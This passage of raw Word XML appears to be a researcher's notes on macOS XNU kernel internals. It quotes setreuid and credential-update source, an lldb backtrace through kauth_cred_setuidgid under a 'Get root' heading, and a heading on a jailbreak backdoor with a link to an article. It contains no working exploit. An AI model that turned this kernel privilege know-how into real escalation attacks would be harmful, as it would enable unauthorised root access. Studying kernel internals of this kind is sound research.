          <w:color w:val="0000FF"/>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if</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p_u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cre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roc_unlock</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kauth_cred_unref</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my_new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my_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kauth_cred_proc_ref</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try again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continue</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 xml:space="preserve">p_ucred </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my_new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update cred on proc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ROC_UPDATE_CREDS_ONPROC</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OSBitOrAtomic</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_SUGID</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_flag</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proc_unlock</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>break</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* Drop old proc reference or our extra referenc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kauth_cred_unref</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>my_cred</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set_security_token</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRPr="000569DB" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRDefault="00DA09FD" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRDefault="00DA09FD" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRPr="000569DB" w:rsidRDefault="00DA09FD" w:rsidP="00DA09FD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRPr="00DA09FD" w:rsidRDefault="00DA09FD" w:rsidP="00DA09FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA09FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="44" w:name="_Toc445313248"/>
      <w:r w:rsidRPr="00DA09FD">
        <w:t>kauth_cred_setuidgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Get root)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>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color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA09FD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bt</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sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>* thread #5: tid = 0x1f93, 0xffffff8010b537a9 kernel.development`kauth_cred_setuidgid(cred=0xffffff80170fcd00, uid=501, gid=20) + 25 at kern_credential.c:4180, name = '0xffffff8017db12a0', queue = '0x0', stop reason = breakpoint 2.1</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sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  * frame #0: 0xffffff8010b537a9 kernel.development`kauth_cred_setuidgid(cred=0xffffff80170fcd00, uid=501, gid=20) + 25 at kern_credential.c:4180 [opt]</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sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #1: 0xffffff8010b8327f kernel.development`settid(p=&lt;unavailable&gt;, uap=&lt;unavailable&gt;, retval=&lt;unavailable&gt;) + 255 at kern_prot.c:1478 [opt]</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sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #2: 0xffffff8010c000ef kernel.development`unix_syscall64(state=0xffffff8017d44bc0) + 703 at systemcalls.c:384 [opt]</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DA09FD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #3: 0xffffff80107bf416 kernel.development`hndl_unix_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRP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21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA09FD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRDefault="00DA09FD" w:rsidP="00DA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999999"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA09FD" w:rsidRPr="000569DB" w:rsidRDefault="00DA09FD" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc445313249"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setreuid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\kern\kern_prot.c</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setreui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Description: Set real and effective user ID system call</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Parameters:  uap-&gt;ruid           real uid to se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uap-&gt;euid           effective uid to se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Returns: 0               Success</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suser:EPERM             Permission denie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Notes:   A value of -1 is a special case indicating that the uid for</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which that value is specified not be changed.  If both values</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are specified as -1, no action is taken.</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If called by a privileged process, the real and effective ui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will be set to the new value(s) specifie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If called from an unprivileged process, the real uid may b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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> *      set to the current value of the real uid, or to the curren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value of the saved uid.  The effective uid may be set to th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current value of any of the effective, real, or saved ui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If the newly requested real uid or effective uid does no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match the saved uid, then set the saved uid to the new</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effective uid (potentially unrecoverably dropping save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privileg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If the credential is changed as a result of this call, then w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flag the process as having set privilege since the last exec.</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in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setre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roc_t p</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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> setreuid_args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uap</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__unused int32_t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retval</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uid_t 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nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> error</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kauth_cred_t my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new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osix_cred_t my_p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DEBUG_CRED_ENTER</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"setreuid %d %d\n"</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r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lastRenderedPageBreak/>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uid_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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uid_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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AUDIT_ARG</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e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AUDIT_ARG</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r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my_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cred_proc_ref</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my_p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posix_cred_get</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no change of r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ruid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ruid = r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uid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ruid = e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sv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ruid = sv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no change of e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uid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euid = e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ruid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euid = r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sv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euid = svui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error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suser</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acflag</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allow root user any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kauth_cred_unref</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my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return</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error</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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Everything's okay, do it.  Copy credentials so other references do</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not see our changes.  get current credential and take a referenc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while we muck with i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for</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uid_t new_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uid_t new_r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uid_t sv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new_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new_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r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Set the credential with new info.  If there is no chang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we get back the same credential we passed in; if there is</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a change, we drop the reference on the credential w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passed in.  The subsequent compare is safe, because it is</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a pointer compare rather than a contents compare.</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e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changing the effective UID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new_e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OSBitOrAtomic</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_SUG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flag</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lastRenderedPageBreak/>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UID_NONE </w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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changing the real UID; must do user accounting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chgproccnt uses list lock for protection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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vo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chgproccnt</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vo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chgproccnt</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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new_r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r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OSBitOrAtomic</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_SUG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flag</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If the newly requested real uid or effective uid does</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not match the saved uid, then set the saved uid to the</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new effective uid.  We are protected from escalation</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by the prechecking.</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sv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ruid </w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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cr_sv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ua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e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svui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new_e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OSBitOrAtomic</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_SUG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flag</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my_new_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cred_setres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r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e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svu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gmui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lastRenderedPageBreak/>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my_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new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DEBUG_CRED_CHANGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"setreuid CH(%d): %p/0x%08x -&gt; %p/0x%08x\n"</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p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p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flags</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new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posix_cred_get</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my_new_cred</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cr_flags</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roc_lock</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We need to protect for a race where another threa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also changed the credential after we took our</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reference.  If p_ucred has changed then we should</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRPr="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             * restart this again with the new cred.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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if</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p_u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cre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roc_unlock</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kauth_cred_unref</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my_new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my_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kauth_cred_proc_ref</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try again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continue</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 xml:space="preserve">p_ucred </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my_new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update cred on proc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ROC_UPDATE_CREDS_ONPROC</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OSBitOrAtomic</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_SUGID</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_flag</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XXX redundant?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proc_unlock</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lastRenderedPageBreak/>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break</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* drop old proc reference or our extra reference */</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kauth_cred_unref</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>my_cred</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set_security_token</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRPr="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F23DCB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>太极越狱后门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23DCB" w:rsidRDefault="00F23DCB" w:rsidP="00F23DCB">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRDefault="004106D2" w:rsidP="00FA2766">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00337115" w:rsidRPr="00683AB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://drops.wooyun.org/tips/6919</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00337115" w:rsidRPr="00F23DCB" w:rsidRDefault="00337115" w:rsidP="00FA2766">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc445313250"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\kern\task.h</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task </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ynchronization/destruction information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decl_lck_mtx_data</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lock</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s loc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ref_coun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Number of references to m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activ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has not been terminated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halting</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is being halted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Miscellaneou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DC4447">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
